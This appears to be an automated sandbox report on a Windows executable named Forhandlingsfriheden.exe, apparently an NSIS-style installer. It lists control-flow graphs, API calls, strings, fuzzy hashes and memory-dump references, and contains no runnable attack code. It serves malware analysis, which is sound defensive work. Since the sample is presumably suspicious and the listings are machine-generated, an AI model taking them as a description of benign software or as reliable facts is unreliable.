                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: daniglacial
                                                                            • API String ID: 2531174081-766043870
                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 603 40333a-40335a GetTickCount call 406a90 600->603 604 40345e-403460 600->604 602 403477-403478 601->602 605 4034b7-4034bb 602->605 616 4034b4 603->616 618 403360-403368 603->618 606 403462-403465 604->606 607 4034a9-4034ad 604->607 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 623 4034b1 610->623 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 623->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->602 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->602 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 650 403412 641->650 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 649 40343e-403442 646->649 651 403429-40342b 647->651 649->630 652 403448 649->652 650->638 651->634 653 40342d-403430 651->653 652->616 653->649
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 551687249-2449383134
                                                                            • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                            • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                            • wsprintfW.USER32 ref: 00406917
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME
                                                                            • API String ID: 2200240437-1106614640
                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040607E
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-1857211195
                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                            • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                            • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 772 402c4f-402c5e 758->772 759->772 779 401680-401683 759->779 763->764 768 401616-40161d call 405b0c 763->768 771 401631-401633 764->771 768->764 783 40161f-401627 call 405a95 768->783 775 401635-40163a 771->775 776 40164c-401654 771->776 780 401649 775->780 781 40163c-401647 GetFileAttributesW 775->781 776->755 776->756 779->772 780->776 781->776 781->780 783->771
                                                                            APIs
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405EC9
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                              • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132,?,00000000,000000F0), ref: 00401672
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132, xrefs: 00401665
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132
                                                                            • API String ID: 1892508949-2158749980
                                                                            • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                            • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                            • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                            • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 799 40742b-40743e 795->799 800 4073cd-4073ee 795->800 798 407313-40731a 796->798 797->798 803 407341 798->803 804 40731c-407320 798->804 805 407347-40734d 799->805 801 4073f0-407405 800->801 802 407407-40741a 800->802 806 40741d-407424 801->806 802->806 803->805 807 407326-40733e 804->807 808 4074cf-4074d9 804->808 810 406af2 805->810 811 4074fa 805->811 813 4073c4 806->813 814 407426 806->814 807->803 812 4074e5-4074f8 808->812 816 406af9-406afd 810->816 817 406c39-406c5a 810->817 818 406b9e-406ba2 810->818 819 406c0e-406c12 810->819 815 4074fd-407501 811->815 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->812 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->812 823->813 824->812 825->811 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->812 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->811 842 406b81 837->842 838->828 839->838 839->839 840->811 840->835 841->840 842->832
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                            • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                            • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                            • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                            • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                            • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                            • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                            • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                            • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                            • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                            • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                            • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                            • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                            • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                            • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                            • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
